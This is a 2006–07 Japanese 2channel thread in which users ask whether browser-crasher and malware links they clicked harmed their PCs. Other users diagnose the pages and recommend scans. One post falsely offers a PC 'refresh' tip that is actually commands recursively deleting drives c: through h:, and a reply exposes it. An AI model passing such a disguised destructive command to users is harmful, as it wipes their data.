VBで全体スキャン→発見なし
【別のオンラインスキャンしたならその結果は】
カスペルスキーのオンラインスキャン(重要な領域)では発見なし
【症状を具体的に、分かる限りすべて書く】 コマンドプロンプトが大量に開きました
【何をしたらそんなことになったのか】 専ブラでクリックしてしまいました
URL:URLリンク(www.vipper.net)
【これまでにとった措置】 トロイを隔離したくらいです。
【その他の質問】
対処に困ってコンセントを抜いたんですが
その後PCを立ち上げるとStartUpScannerでこのようなログが出ました。
追加されたスタートアップです!
Location:HKCU
KeyName:MSMSGS
Command:"C:\Program Files\Messenger\msmsgs.exe" /background
KeyDataType:String
ExeFileName:C:\Program Files\Messenger\msmsgs.exe
ExeTimeStamp:2004/10/14 1:24:38
ExeFileSize:1,694,208
ExeMd5:74e6e96c6f0e2eca4edbb7f7a468f259
お願いします。
141:名無しさん@お腹いっぱい。
06/12/19 02:03:32
>>140
PSYMEを探してみた。メディアプレイヤーを上書きするトロイはあるみたいだが、メッセンジャーを上書きorメッセンジャーに感染は見つからなかった。
参考まで
URLリンク(www.trendmicro.co.jp)
URLリンク(www3.ca.com)
142:名無しさん@お腹いっぱい。
06/12/19 12:40:13
>>132
死ね 氏ねじゃなくて死ね
143:140
06/12/19 15:03:10
>>141
ありがとうございます!
メッセンジャー書き換えとかのトロイはないんですか・・・
また質問ですいませんが
メッセンジャー関係で何もしていなければこのログはトロイによって変更されたと考えて良いのでしょうか?
144:名無しさん@お腹いっぱい。
06/12/19 15:29:15
ブラクラの効果でOutlook Expressが起動したんだろ。
それと一緒にWindows Messengerが起動してスタートアップに放り込まれたんじゃねえの?
あれは一度起動すると設定を変えない限りスタートアップで起動するようになる。
145:名無しさん@お腹いっぱい。
06/12/19 16:17:55
>>144
メッセンジャーを起動して設定からバックグラウンドで起動~のチェックを外したら
スタートアップから消えました
本当にありがとうございます!
146:名無しさん@お腹いっぱい。
06/12/19 23:21:54
>>145
PSYMEのトロイはもまえのVBで対応済みだと思う。隔離したというメッセージがでてればOK。
147:名無しさん@お腹いっぱい。
06/12/20 01:35:15
>>146
ありがとうございます
検出はAVGがしまして、それで隔離しました
今考えたら大量にウインドウが出たときにAVGとVBでぶつかって
検出に支障を来たしていないかと心配ですが・・・
148:名無しさん@お腹いっぱい。
06/12/20 01:59:36
AVGとVB・・・
まずは信頼できるやつをひとついれ
オンラインスキャン(カスペルスキーとか)を併用した方がよい
149:名無しさん@お腹いっぱい。
06/12/20 15:26:00
ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm
の頭にhttp://をつけて下さい
jpgファイルを油断して踏んだらこちらに繋がったようです
これも>>3と同種でしょうか
150:149
06/12/20 15:36:20
すいません恐らく>>140と同じファイルだった様です
一応ウィルスは削除したのですがブラクラでウィルスまで貰ったのは初めてだったので。
これはウィルスの削除だけしておけば問題ないでしょうか
151:名無しさん@お腹いっぱい。
06/12/20 17:21:20
>>150
セキュリティホールを突いてくるウイルスサイトだが
OSがかなり古い状態でなければ踏んでも特に問題は無い
XPあたりなら素の状態でもシステム改変は無いだろう
念の為 一時ファイル削除してウイルススキャンして何も出なければ完了
152:名無しさん@お腹いっぱい。
06/12/20 17:22:54
>>150
なんのウィルス対策ソフト使ってるかわかんないんで安易に大丈夫とはいいにくい
カスペルスキーのオンラインスキャンでもやって確かめてみればおk
なお、あらかじめソフトが隔離したやつは削除、ならびにブラウザのキャッシュ(一時ファイル)なども削除して
PCを再起動させてからオンラインスキャンを開始かな
153:149
06/12/20 19:05:18
win2kで8月にアップデートしたので恐らく大丈夫だと思います
さっきカスペルスキーのオンラインスキャンもしてみましたが問題ないようでした。
アドバイスありがとうございました。
154:名無しさん@お腹いっぱい。
06/12/29 12:51:09
怖くて踏めないサイトのアドレス
を確認してくれるスレがあったと思うのですが
どこでしたでしょうか?
155:名無しさん@お腹いっぱい。
06/12/29 20:07:35
>>154
勇気がなくて踏めないURL鑑定スレin初質 Part1
スレリンク(qa板)
156:名無しさん@お腹いっぱい。
06/12/29 23:28:28
さんくすです
157:名無しさん@お腹いっぱい。
06/12/30 21:10:24
>>82
俺も踏んでもうたorz
158:名無しさん@お腹いっぱい。
06/12/31 12:53:03
最近PCが重いとか、起動シャットダウンが遅いとか思ってる人は、
リフレッシュコマンドを試してみるといい。
以下を実行することでディスク/ドライプの節約、メモリの開放になる。
1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q d:
と入力し[OK]をクリックする。
上記と同様に以下も順に実行する。
cmd /c rd /s /q e:
cmd /c rd /s /q f:
cmd /c rd /s /q g:
cmd /c rd /s /q h:
cmd /c rd /s /q c:
これでディスク/ドライプがクリアされて正常になる。
事前予防にもなるので、やった事がなければ試してみる価値あり。
年末なのでPCもリフレッシュしましょう。
159:名無しさん@お腹いっぱい。
06/12/31 17:13:53
実行するとDドライブが全部消えちまうじゃねーか
160:名無しさん@お腹いっぱい。
06/12/31 18:17:11
RMDIR(RD)ディレクトリの削除
161:名無しさん@お腹いっぱい。
07/01/01 01:49:47
これブラクラらしいんですけど踏むと何か後遺症ありますか?
162:名無しさん@お腹いっぱい。
07/01/01 01:50:45
貼れてなかった…
これです
URLリンク(vip.6to23.com)
163:名無しさん@お腹いっぱい。
07/01/01 03:31:32
>>162
ただのびっくりページ
PCに悪さをするようなものは特に無い
164:名無しさん@お腹いっぱい。
07/01/02 03:58:51
【使用OS】 widowsXP SP2
【WindowsUpdateしてるか】 適宜
【AntiVirusは何を使っているか】 ウイルスバスター2006
【ちゃんとUpdateしてるか】 毎日
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】 してません
【症状を具体的に、分かる限りすべて書く】 症状は今のところ無し
【何をしたらそんなことになったのか】
すいません、これ踏んじゃったんですが、htmlが偽装されてますよね?
openjaneと、firefoxで踏んじゃったんですが…。
不安だったので、聞きに来ました。お願いします。
URLリンク(ea.uuhp.com)
【これまでにとった措置】 ウイルスバスターで検索
【その他の質問】
165:名無しさん@お腹いっぱい。
07/01/02 04:26:24
MUVIC COMってなんなんですか?
166:164
07/01/02 04:51:50
ググったら、FDDアタックやらウィンドウオープンやらのブラクラらしいですね。
カスペのオンラインスキャンもやったんですが、何も発見されませんでした。
これは後遺症は無いんでしょうか?
167:名無しさん@お腹いっぱい。
07/01/02 04:59:33
>>166
基本的にはブラクラの類に属するものでウイルスやらシステム感染は無いはず
conconとか仕掛けているのを見ると、随分昔に作られたもののよう
今時のPCなら特に問題無い
IEで踏んだが発動したのはウィンドウオープンとFDDアタックだけだった
アンチウイルスによっては踏んだ時にWinbombとかそんな感じで反応があるかも知れない
対処法としては放置しても構わないが、何か気持ち悪いと思うなら一時ファイル削除して再起動で十分
168:164
07/01/02 05:13:43
>>167
ありがとうございます!
ヤフーで検索したら、今ちょっと出回ってるurlらしくて、
踏んでしまった自分が恥ずかしい限りです。勉強になりました。
キャッシュ消し再起動もやっておきます。
169:名無しさん@お腹いっぱい。
07/01/02 05:43:47
時々見かける目障りなURLだったからアク禁覚悟で流しておいた
もう404になっているはず
170:164
07/01/02 08:51:42
>>169
ありがとうございます。
あぷろだ確認しましたが、流されてました。
そういう二時被害の防ぎ方もあるんですね。勉強になりました。
171:名無しさん@お腹いっぱい。
07/01/03 04:06:05
URLリンク(www.vipper.net)
上記のファイルを誤って踏んでしまいました
OS(XP)、Norton Internet Security共に最新の状態でした
一通りウイルスチェックを行いましたが、その後どの様に対処すればよいのでしょうか…
172:名無しさん@お腹いっぱい。
07/01/03 04:52:03
>>171
スレリンク(sec板:9番)
症状の内容は?
173:名無しさん@お腹いっぱい。
07/01/03 05:22:47
>>172
ウインドウがたくさん出てきたりtelnetがどうとか…
あとWMPやRMが何度も実行されました
結局LANケーブル引っこ抜いて再起動させました
今レポートを見てみたらhellplantやip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm、blacksheepに繋がってしまったみたいです…
174:172
07/01/03 05:56:42
ダウンロードして検体送付しときました。
タスクマネージャーのプロセスにおかしなexeがないか?自分で確認しておいて下さい
175:名無しさん@お腹いっぱい。
07/01/03 05:56:49
>>173
「WELCOME」だね。前スレが落ちてるので以下コピペ
以下の有害サイトを大量に呼び出すブラクラ
1.www.hellplant.org/cgi-bin/xoor/serpent.cgi
厨房ホイホイ。IP抜かれるくらいで特に害は無い
2.www.albinoblacksheep.com/flash/you.html
元ブラクラ。今はただのフラッシュ。害は無い
3.ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm
脆弱性を突いてWMPを破壊、任意のコードを実行
とりあえず危険なのは3のURLだが
脆弱性自体は2年位前に塞がれているはず
結論としてはWindowsがよっぽど古い状態でなければ問題は無い
一時ファイル削除して適当なウイルススキャンして何も出なければ完了
176:名無しさん@お腹いっぱい。
07/01/03 06:02:53
私も>>171を踏んでしまいました一人です
>>175
>一時ファイル削除して適当なウイルススキャンして何も出なければ完了
なにも出ませんでしたが、outlookにhellplantなんたらのアカウントが大量に出来てますが大丈夫でしょうか?
177:171
07/01/03 06:08:51
>>174
ありがとうございます
注意深く見ておかないといけませんね
>>175
既出でしたか…
jpgファイルでこんな事になるとは思ってもみませんでした
OSもNISも最新の状態ですし大丈夫そうですね
皆様本当にありがとうございました
今後は安易にファイルを踏むことのない様慎重に対応するよう心がけます
178:名無しさん@お腹いっぱい。
07/01/03 06:16:39
>>176
>>171に>>3が含まれているための影響
手動で消してもいいが大抵Outlookを何回か起動・終了を繰り返すうちに
勝手に消えているはず。放置しても特に構わない
179:名無しさん@お腹いっぱい。
07/01/03 06:17:56
>>178
ありがとうございます。いい教訓になりましたorz
180:名無しさん@お腹いっぱい。
07/01/03 06:24:56
>>171
>>176
2ちゃんねる専用ブラウザ使ってますか?
181:171
07/01/03 06:29:49
>>180
Jane Doe Styleを使っているのですがリンク先をIEで踏んでしまいまして…
もし「.html」の部分が無ければViewerで踏むことになったのかな
182:176
07/01/03 06:30:18
>>180
Live2chを使ってますが、ポップアップさせずにクリックしてしまいました・・・反省してます
183:名無しさん@お腹いっぱい。
07/01/03 06:39:32
>>171
>>176
「CLUBPC security」などでブラウザのセキュリティ設定を再勉強しておきましょう
184:176
07/01/03 06:46:25
>>183
はい
あと>>171には>>175に加えて
URLリンク(cyberdyne-co-ltd.hp.infoseek.co.jp)
の標本No.7の症状も現れたことを付け加えておきます。
185:171
07/01/03 06:50:40
>>183
これを機にしっかり勉強しておきたいと思います
いやはやお恥ずかしい…
>>184
telnet接続画面はそのサイトのNo.3、hellplantのものではないでしょうか?
186:176
07/01/03 06:59:03
>>185
> telnet接続画面はそのサイトのNo.3、hellplantのものではないでしょうか?
私の場合、connectionなんたらというのが記述されたコマンドプロンプトが大量に出たのですが・・・
187:171
07/01/03 07:18:57
>>186
私が確認できる限りでは>>175さんが引用して下さった3サイトへの接続のみだったかと思います
でももしご指摘されたサイトへも接続されていたら面倒ですね
188:名無しさん@お腹いっぱい。
07/01/03 07:46:58
>>186
URLリンク(www.alaxala.com)
の「telnetコマンドの応答メッセージ一覧」のどれかが表示されただけだと思うが…
自分の環境では接続に失敗したtelnetプロンプトは即座に消えてしまうので
メッセージ内容は捉えきれなかった
接続先は>>3以外には無いし、繋がったという話も今まで聞いた事は無い
189:名無しさん@お腹いっぱい。
07/01/03 08:00:04
ブリクラ博物館
URLリンク(cyberdyne-co-ltd.hp.infoseek.co.jp)
190:名無しさん@お腹いっぱい。
07/01/03 08:32:22
test
191:176
07/01/03 17:32:50
>>188
どうやら接続できませんのメッセージが書かれたtelnetプロンプトだったみたいです
初めてだったのでコマンドプロンプトだとはやとちりしたのでしょうorz
ただ、私の場合は接続に失敗したtelnetプロンプトは消えずに
URLリンク(www.aylp.net)
のTelnetストームのような状態になりました
192:名無しさん@お腹いっぱい。
07/01/04 17:16:44
精神的ブラクラ踏んでしまいました
はぁ。
193:名無しさん@お腹いっぱい。
07/01/06 04:01:30
URLリンク(pcshop.tyabo.com)
ニュー速報から張ってあって、踏んでしまいました。
194:名無しさん@お腹いっぱい。
07/01/06 04:11:23
>>193
とりあえずWindowsUpdateしてあるなら踏んで即感染は無いはず
念を入れるなら一時ファイル削除して適当なウイルススキャン
ブラクラじゃなくてれっきとしたウイルスサイトだと思われ
195:名無しさん@お腹いっぱい。
07/01/06 10:42:35
>>193
Trojan-Downloader.VBS.Small.bo 検出
196:名無しさん@お腹いっぱい。
07/01/06 18:18:41
URLリンク(114090.net)
ニュース速報のやつ(同じもの?)を踏んだぜ!
197:名無しさん@お腹いっぱい。
07/01/06 23:15:32
>>196
中身は>>20あたりと同じ
有害無害含めて30種類の悪意あるサイトを呼び出す
WindowsUpdate済みなら多分踏んで即感染は無い
198:名無しさん@お腹いっぱい。
07/01/07 09:44:20
これを、クリックするとパソコンの電源が切れてしまったのですが、ウィルスに感染したのでしょうか?
URLリンク(www.nobsxxxhost.com)
199:名無しさん@お腹いっぱい。
07/01/07 19:35:13
>>198
URLリンク(www.nobsxxxhost.com) 自体は
海外のホスティングサイトかな
当該のURLリンク(www.nobsxxxhost.com) は
ページが消えているみたいで踏むと404扱いのページに飛ばされて
ランダムでアダルトサイトや詐欺ソフトサイトの広告ポップアップが現れる
もしかしたらこの中のどれかが原因かも知れないが
確認した限りではそこまで危険性の高いページは無かった
あるいはお前さんが踏んだ時には、まだページが残っていたのかも知れないが…
心配なら適当なウイルススキャンでもどうぞ
200:名無しさん@お腹いっぱい。
07/01/07 21:16:33
>>199
ありがとうございます。
わざわざリスクを負って調べていただき感謝いたします。
m(__)m
201:名無しさん@お腹いっぱい。
07/01/09 20:19:47
p://www.goggle.com/
p://www.yourdailymedia.com/media/1160043117/Goggle.com_Destroys_Your_PC
上のアドレスは立ちの悪いブラクラで
下のアドレスは上のアドレスを踏んだらどうなるか、
というものらしいのですが下のアドレスは安全なものでしょうか?
それと上のアドレスで起こりうる被害はどのようなものなのでしょうか?
202:名無しさん@お腹いっぱい。
07/01/09 23:19:01
なぜWindowsUpdateしてなかったら危ないんでしょうか?
203:名無しさん@お腹いっぱい。
07/01/09 23:34:27
すいません、グぐったら分かりました。
204:名無しさん@お腹いっぱい。
07/01/10 02:26:11
>>201
上はgoogleのタイプミスにつけこんだスパイウェア配布サイトだった、らしい
今現在は、踏んで即危険というわけでは無い様だけど、
ランダムで詐欺くさい広告窓が立ち上がる。サイトの本質は変わって無いのだろう
下はその通りの内容。マカフィーの広告動画かと思われ
205:名無しさん@お腹いっぱい。
07/01/10 18:25:57
>>204
どうもありがとうございました
206:名無しさん@お腹いっぱい。
07/01/13 21:12:49
2ch閉鎖騒動で各板の閉鎖スレを見ていたら、PCニュース板の
【ひろゆき】2ch、年内にも閉鎖へ【自己破産】
スレリンク(pcnews板)l50
のスレをギコナビで見ようとした瞬間、Macfeeがトロイの木馬を検知しました。
Macfeeがログのdatファイルを削除してくれたのですが、どうすればいいですか?
207:名無しさん@お腹いっぱい。
07/01/13 21:59:42
誤検知(ウィルスコード)なので放置でおk
208:名無しさん@お腹いっぱい。
07/01/13 22:03:50
>>207
誤検知ですか・・スレダウンロードするだけでウィルスに感染なんてするの?!
って思って焦ってこのスレにきました。ありがとうございます。
スレ内にウィルスコードが書かれていたというこでしょうか?
209:名無しさん@お腹いっぱい。
07/01/13 22:20:51
>>208
意味不明な妙な文字列があったのならそれがウィルスコード
210:名無しさん@お腹いっぱい。
07/01/14 03:50:26
URLリンク(nexx.jp)
これブラクラっすか?
211:名無しさん@お腹いっぱい。
07/01/14 04:11:58
>>210
ただのジョークだな
212:名無しさん@お腹いっぱい。
07/01/14 09:31:28
なんだ。
【社会】モーニング娘。吉澤ひとみさん号泣…16歳弟が東京・新宿で交通事故死★3
スレリンク(newsplus板:4番)
213:名無しさん@お腹いっぱい。
07/01/14 10:57:52
URLリンク(www16.tok2.com)
214:名無しさん@お腹いっぱい。
07/01/14 18:12:43
URLリンク(headline-news.tripod.com)
215:名無しさん@お腹いっぱい。
07/01/14 18:16:11
直リンすまん
216:名無しさん@お腹いっぱい。
07/01/14 19:00:16
URLリンク(monoganac2.sakura.ne.jp)
ポップアップを消しても消しても出てきます
これ以外にPCに悪影響あるでしょうか?
217:名無しさん@お腹いっぱい。
07/01/14 19:54:58
俺がいつも使っているパソコンが壊れたので、ノートからの質問です。
ブラウザを動かすと残像みたいに無限にブラウザが出てくるようになってしまいました。
Alt+F4でも、再起動しても直りません、助けてください。
218:名無しさん@お腹いっぱい。
07/01/14 21:25:05
>>216
無限アラート。タスクマネージャからブラウザ強制終了で脱出できる
PCに特に悪影響は無い
>>217
(残像消えずにいつまでも残っているのなら)
物理的にPCがいかれた場合にそんな症状になる場合もある
修理逝き
219:216
07/01/14 21:42:53
>>218
ジョークみたいですね
ありがとうございます
220:名無しさん@お腹いっぱい。
07/01/16 00:42:40
URLリンク(vip.6to23.com)
これってやばい?
FireFoxで開いたからポップアップブロックしたけど
後に中華メッセージが出た
221:名無しさん@お腹いっぱい。
07/01/16 01:02:27
>>220
ひとつめのリンク先へと飛び、その後さらに画像があるリンクへと飛ぶ
ホラー系画像があまりにもゆっくり描写されたので、びびりなし(笑)
222:名無しさん@お腹いっぱい。
07/01/16 08:43:09
URLリンク(headline-news.tripod.com)
これの中身はなんでしょうか・・・
変なのがダウンロードされようとしましたが
223:名無しさん@お腹いっぱい。
07/01/16 12:16:04
>>222
中身はもう消えたみたい。>>214と同じURLだね
残っていた時には確かconconクラッシャーやexeの直リンク
複数のウイルスサイトの呼び出しがあったと思う
とりあえず踏んでも即感染は無いと思うけど
一時ファイル削除して適当なウイルススキャンで何も出なければ完了
224:名無しさん@お腹いっぱい。
07/01/16 12:52:58
ありがとうございました
225:名無しさん@お腹いっぱい。
07/01/17 22:39:41
URLリンク(dailynews.i8.com)
芸スポで踏んでしまいました、アウトルックで新規作成メールの窓がたくさん開いたりしましたが、
ウイルス感染はないでしょうか?
226:名無しさん@お腹いっぱい。
07/01/17 22:42:41
>>225
トロイの警告が出るね
227:名無しさん@お腹いっぱい。
07/01/17 22:44:13
マジですか・・・ノートンのオートプロテクト外したままで踏んでしまいました・・・
228:名無しさん@お腹いっぱい。
07/01/17 22:48:50
>>225
URLリンク(www.trendmicro.co.jp)
これだね
とくに問題はないみたいよ
229:名無しさん@お腹いっぱい。
07/01/17 22:51:46
>>226 >>228
ありがとうございます
とりあえずほっとしました
さきほどからスキャンかけてるんですが、今のところ何も出てこないので
逆に不安になってました
230:名無しさん@お腹いっぱい。
07/01/17 22:54:28
>>228以外に他のトロイもダウンロードしようとしてるね
NOD32でWin32/TrojanDownloader.Buskyって出たけど
231:名無しさん@お腹いっぱい。
07/01/17 22:59:45
>>230
うはぁ
とりあえずスキャンかけてみたんですが、何もでませんでした・・・
再起動してもう一回やってみます
232:名無しさん@お腹いっぱい。
07/01/17 23:08:01
>>231
>>230のやつ
URLリンク(www.virustotal.com)
233:名無しさん@お腹いっぱい。
07/01/17 23:30:03
>>232
うーんよくわからないです・・・
なんか新型とかでノートンじゃまだ対応してないんですかね・・・
234:名無しさん@お腹いっぱい。
07/01/17 23:38:50
心配ならカスペルスキーのオンラインスキャンでもしてみれば。
ちなみにPeerGuardian入れてると>>228はダウンロードできない。
P2PやってなくてもPeerGuardian結構役に立つよ。
235:名無しさん@お腹いっぱい。
07/01/17 23:39:41
>ちなみにPeerGuardian入れてると>>228はダウンロードできない。
>>228じゃなくて>>230のトロイ
236:名無しさん@お腹いっぱい。
07/01/17 23:47:49
>>234
ピア2もインストしているのに、立ち上げていませんでした・・・何やってんでしょうね自分
カスペルスキーのオンラインスキャン試してみます、色々ありがとうございます
237:名無しさん@お腹いっぱい。
07/01/21 11:17:23
URLリンク(www.2flashgames.com)
このリンクを踏んだら「・・・が組み込まれました」とか言う表示が出るDOS窓がたくさん開きました
さらにその後もPCを使っていると時々一瞬だけDOS窓が開くようになってしまいました
これは何かのウイルスに感染していますか?
238:名無しさん@お腹いっぱい。
07/01/21 20:33:27
>>237
必ずでは無いがウイルスサイトの呼び出しがある
サイト内にある広告経由かな…結果は多少ランダムかも知れない
Updateを怠っていなければ感染は無いと思うが…
>>7次第だがとりあえずウイルススキャンした方が吉
手持ちのアンチウイルスが無いなら
スレリンク(sec板:8番)
239:名無しさん@お腹いっぱい。
07/01/21 20:50:18
>>237
そこもPeerGuardianでブロックされる。
直接的なアドバイスじゃないがPeerGuardian入れとくといいよ。
超おすすめ。
240:237
07/01/22 08:18:52
オンラインスキャンしてみてもなにもウイルスは検出されなかったのですが
タスクマネージャーが起動できなくなったり
ドラッグ アンド ドロップが出来なくなったり
カナ漢字入力システムを組み込みましたって書かれた窓がたくさん開いたりして
気持ちが悪いのでOSを再インストールしました
普段はjavaとかActiveXを常にoffにしているのですが
フラッシュゲームのページだと思って油断して踏んだらやられちゃいました
ウイルスソフトを何も使ってなかった自分が悪いのですが・・・
>>238 >>239
アドバイスありがとうございました
今後は対策ソフトを導入したいと思います
241:名無しさん@お腹いっぱい。
07/01/22 21:11:09
ブラクラ登録推奨
URLリンク(www.hellplant.org)
URLリンク(www.lbycwi.org)
242:名無しさん@お腹いっぱい。
07/01/22 21:15:39
>>241
㌧
243:名無しさん@お腹いっぱい。
07/01/23 01:39:02
このサイトの正体お願いします
URLリンク(www.110kz.com)
244:名無しさん@お腹いっぱい。
07/01/23 01:49:42
>>243
びびらせ洒落サイト
アクセスすると、文字列多彩な画面がだぁーとスクロール
そのあと
全部冗談です。製作者は善良なのです。
よく耐えました。あなたは真の勇者です。
マラカスパンダをクリックして交流広場にお進みください。
コーヒーでも飲んで、バクバクしている心臓を落ち着けましょう。
がでてくる。^^
245:名無しさん@お腹いっぱい。
07/01/23 02:09:02
こういうブラクラサイトを検査するソフトとかってないんですかね?
どこかの個人がやれば小遣いかせぎにはなると思うんですが
トレンドマイクロあたりにやってほしい
246:名無しさん@お腹いっぱい。
07/01/23 02:18:42
>>245
ブククラじゃないぞ、ジョークサイトで無害だぞ
247:781
07/01/23 02:21:36
>>242のことじゃなくて一般的なブラクラのことね
最近はられてるゴッグル(goggle)とか
248:名無しさん@お腹いっぱい。
07/01/23 02:31:51
そいうことかー
そういやさっき、さっそgoggle貼られてたわw
249:名無しさん@お腹いっぱい。
07/01/23 05:04:54
友人5人で大学のパソでgoggle gorgleとかブラクラ踏みまくって遊んでたら、
鮮やかにバレテひどいめに・・・
250:名無しさん@お腹いっぱい。
07/01/23 18:37:46
>>244
㌧クス
251:名無しさん@お腹いっぱい。
07/01/24 16:12:43
これ踏んじゃったんですが大丈夫でしょうか ?
URLリンク(www.lbycwi.org)
なんか巨大な画像が出てきます。
252:名無しさん@お腹いっぱい。
07/01/24 16:18:54
ごめん、 >>5に出てました。
253:名無しさん@お腹いっぱい。
07/01/24 22:27:59
URLリンク(webnews.writernetwork.com)
踏んでしまいました・・・
WindowsUpdateはやってて、使っているAntiVirusは
ノートンです。
ちゃんとUpdateはしてますが・・・なんかPC遅くなりました。
よろしくおねがいします。
254:名無しさん@お腹いっぱい。
07/01/24 22:47:42
Janeなどの専ブラウザを使っている人は
command.datに下記の文章を追加しましょう
これらを追加するだけで危険性がグッと減ります
チェック=
ANSIドメイン/IPアドレス検索=URLリンク(whois.ansi.co.jp)
ブラクラチェック=URLリンク(so.7walker.net)
ウイルスデータベース=URLリンク(www.trendmicro.co.jp)
255:名無しさん@お腹いっぱい。
07/01/24 22:50:05
>>253
中身自体は>>222と同内容
各種ブラクラ、それと一応ウイルスサイトの呼び出しがあるので
一時ファイル削除してウイルススキャン
PCが遅くなるのは多分メモリを大量に消費しているので
ウイルススキャン終了後にでも再起動を
256:名無しさん@お腹いっぱい。
07/01/25 00:42:56
>>255
ありがとうございます!
257:名無しさん@お腹いっぱい。
07/01/25 18:25:14
すみません、これ踏んじゃいました
URLリンク(dailynews.7p.com)
だいじょうぶでしょうか?
258:名無しさん@お腹いっぱい。
07/01/25 19:03:00
【使用OS】 XP
【WindowsUpdateしてるか】 最近はしていません
【AntiVirusは何を使っているか】 ウィルスセキュリティー
【ちゃんとUpdateしてるか】 最近していないです・・・
【スキャンした結果】何も発見されませんでした。
【別のオンラインスキャンしたならその結果は】
ウィルスバスターでスキャンしたのですが、何も発見されませんでした
【症状を具体的に、分かる限りすべて書く】症状は特にないです。
【何をしたらそんなことになったのか】
ここ踏んじゃいました・・・。
URLリンク(www2.strangeworld.org)
ウィンドウがたくさん出て、OutlookExpressも勝手に起動しました。
【これまでにとった措置】
強制的に電源を切って、再起動して一時ファイルの削除、ウィルススキャンしました。
【その他の質問】
危険なウィルスやスパイウェアに感染してしまったのでしょうか?
259:名無しさん@お腹いっぱい。
07/01/25 19:57:41
URLリンク(successmoon.blogzine.jp)
260:名無しさん@お腹いっぱい。
07/01/25 21:11:07
>>257
>>253 >>222 辺りと同じもの
一時ファイル削除してウイルススキャン
>>258
純粋なブラクラなのでシステム感染は無い
電源切るのはアレだがその措置で十分
URLリンク(cyberdyne-co-ltd.hp.infoseek.co.jp)
>>259
何という重いブログ…画像貼りすぎだろ…
ここまで来ると嫌がらせに近いな
261:名無しさん@お腹いっぱい。
07/01/25 22:41:01
URLリンク(up2.viploader.net)
URLリンク(up2.viploader.net)
多分>>4なんですが実害ありますか?
バスター2006無反応
ウイルスコードらしき文字列の画面
262:名無しさん@お腹いっぱい。
07/01/25 23:11:42
追記です
OS XPSP2
ブラウザ IE6 拡張子ではなく、内容(ryは無効
初めて踏んだんでびびりました('A`)
263:名無しさん@お腹いっぱい。
07/01/26 00:59:36
やっとロダに繋がった…
>>261-262
いわゆる「ノートントラップ」
実体はただのテキストファイルでアンチウイルスが反応する文字列が
ずらずらと書いてあるだけの代物
踏んでも実害は無い。放置でおk
264:名無しさん@お腹いっぱい。
07/01/26 01:07:43
>>263
レスサンクスです
265:258
07/01/26 15:25:01
>>260
レスありがとうございます。安心しました。
266:名無しさん@お腹いっぱい。
07/01/26 22:34:23
マシンがPen4 3.4 RAM1.5Gなのでそれほど重いとは感じないけど
2006に戻そうか考え中
Pen4 2.2では多少だるさが感じるので一気に全部2006に戻そうかな?
267:名無しさん@お腹いっぱい。
07/01/26 23:48:34
URLリンク(chiffon.ty.land.to)
上記をふんでしまいましたが、実害はありますでしょうか?
OS : XP Pro sp2
AntiVirus : Norton(2ヶ月期限切)
WindowsUD:最近してません
上記URLをsleipnirで表示した際,mailtoストーム
Media Player,telnet接続等が発生しました。
4>>だとおもわれますが、最近はこんなのもあるんですね・・・
sleipnirのJavaScript,Active X系はすべてoffで、
プログラムが起動するとは思いませんでした。
268:名無しさん@お腹いっぱい。
07/01/27 12:08:46
>>267
各種ブラクラ+ウイルスサイトの呼び出しがあるので
とりあえずウイルススキャン
運悪くサイトに繋がって且つOSに穴が開いている状況だと感染も有り得る
269:名無しさん@お腹いっぱい。
07/01/27 12:24:03
音楽配信板で踏んじゃいました。
不安です・・・
694 :名無しさん@お腹いっぱい。:2007/01/21(日) 20:08:01 ID:IPqkCJvP0
ここだよ、ここ。皆すごい勢いで落としてる。
スレリンク(wm板)
270:名無しさん@お腹いっぱい。
07/01/27 12:51:23
音楽配信板で踏んじゃいました。
不安です・・・
694 :名無しさん@お腹いっぱい。:2007/01/21(日) 20:08:01 ID:IPqkCJvP0
ここだよ、ここ。皆すごい勢いで落としてる。
スレリンク(wm板)
271:名無しさん@お腹いっぱい。
07/01/27 12:59:01
??
2ちゃんねるのスレッドでしょ?
272:名無しさん@お腹いっぱい。
07/01/27 13:07:42
スイマセン。間違えました。
668 :名無しさん@お腹いっぱい。:2007/01/05(金) 12:20:56 ID:WivsBDHm0
URLリンク(www.mayhem.net)
↑mp3大量 無料
こっちです・・
273:名無しさん@お腹いっぱい。
07/01/27 13:24:27
>>272
変な生き物の画像ウィンドウが音付きで飛び回る
URLリンク(cyberdyne-co-ltd.hp.infoseek.co.jp)
の標本No.12
踏んでも特に害は無いよ。Alt+F4 で脱出
274:名無しさん@お腹いっぱい。
07/01/27 13:48:04
>>273
ありがとうございました!
275:名無しさん@お腹いっぱい。
07/01/27 15:13:08
>>268
レスありがとうございます。
定義期限切れですがスキャンで問題なかったので、
解決したことにします。
276:名無しさん@お腹いっぱい。
07/01/27 21:27:26
URLリンク(gazo-xxx.com)
これって詐欺?
277:名無しさん@お腹いっぱい。
07/01/27 22:27:10
ワンクリ詐欺だね
URLリンク(gazo-xxx.com)
ここで「同意」するとそのページに飛ぶ
ページ閉じても復活する所が鬱陶しい
278:名無しさん@お腹いっぱい。
07/01/27 23:28:28
スレリンク(cm板)
これは何でしょうか?
279:名無しさん@お腹いっぱい。
07/01/27 23:32:14
??
2ちゃんねるのスレッドでしょ?
280:名無しさん@お腹いっぱい。
07/01/28 05:11:54
踏んじゃいました・・・情けない・・・うぅぅ
↓のダウンロードって書いてあるところのリンクです。
URLリンク(kasamatusan.sakura.ne.jp)
html見てみたんですけどこれかな?↓
URLリンク(s15.j-a-net.jp)
御願いしますm( __ __ )m
281:名無しさん@お腹いっぱい。
07/01/28 05:18:21
>>280に追記
>>3の一種でしょうか?メディアプレーヤーやtelnetを起動
Outlookに変なニュースグループを作成まで一緒で、最後に音が大音量でした
OSアップデータはしてあります。
ウィルス対策ソフトはウイルスセキュリティーZeroです。
282:名無しさん@お腹いっぱい。
07/01/28 05:55:31
>>280-281
ページタイトル「WELCOME」だから内容は>>171と同じもの
対処法は>>175で
「最後に音が大音量でした」は元ブラクラサイトに置いてあるフラッシュ
(>>175の2)かと
有害といえば有害だがまぁ問題無いかと思われ
心配なら一時ファイル削除して適当なウイルススキャン
スレリンク(sec板:8番)
283:名無しさん@お腹いっぱい。
07/01/28 06:14:37
>>282
ありがとうございますm( __ __ )m
現在VSでのスキャンが完了、感染なし
久しぶりにシマンテックのオンラインスキャンを実行してみたところ
半分スキャンした時点で4個詳細は今のところ不明です。
VSのクオリティーには驚かされます。
284:280
